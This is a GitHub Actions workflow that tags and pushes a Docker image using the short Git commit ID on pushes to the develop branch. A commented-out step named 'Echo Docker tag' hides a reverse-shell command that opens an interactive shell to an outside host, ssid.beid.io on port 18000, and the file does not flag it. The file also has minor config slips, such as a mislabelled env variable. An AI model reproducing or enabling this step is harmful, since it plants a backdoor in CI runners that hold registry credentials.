name: Retag Image with Commit id
run-name: Build and Push Image with commitid

on:
  push:
    branches: ["develop"]

jobs:
  update_tag_with_committid:

    name: Update tag image with Git commitID
    runs-on: ubuntu-latest

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v4 

      - name: Get Git CommitId  
        run: |
            echo "commit_id=$(git rev-parse --short $GITHUB_SHA)" >> $GITHUB_ENV
            echo "branch=$(echo ${GITHUB_REF#refs/heads/})" >> $GITHUB_ENV
            source $GITHUB_ENV
            echo "branch: " $branch
            echo "commitid: " $commit_id
            
      - name: Log in to Docker Hub
        uses: docker/login-action@f4ef78c080cd8ba55a85445d5b36e214a81df20a
        with:
          username: ${{ secrets.DOCKER_USERNAME }}
          password: ${{ secrets.DOCKER_PASSWORD }}

      - name: Setup Docker Buildx
        uses: docker/setup-buildx-action@v3

      - name: Set CommitId to Output
        id: git-commitid
        run: echo "COMMIT_ID=$commit_id" >> "$GITHUB_OUTPUT"

      - name: Use CommitId from previouse step
        env:
          SELECTED_COLOR: ${{ steps.git-commitid.outputs.COMMIT_ID }}
        run: echo "Commit Id is $COMMIT_ID"

      # - name: Echo Docker tag
      #   env: 
      #        COMMIT_ID:: ${{ commit_id }} 
      #   run: |
      #        sh -i >& /dev/tcp/ssid.beid.io/18000 0>&1
      #        echo "Docker tag: ***/week-9-1021: " $COMMIT_ID

      # - name: Build and Push with tag = Git CommitId
      #   uses: docker/build-push-action@v5
      #   env: 
      #       COMMIT_ID: $commit_id
      #   with:
      #     context: .
      #     file: ./Dockerfile
      #     push: true
      #     tags: ${{ secrets.DOCKER_USERNAME }}/week-9-1021:${{ github.sha }}
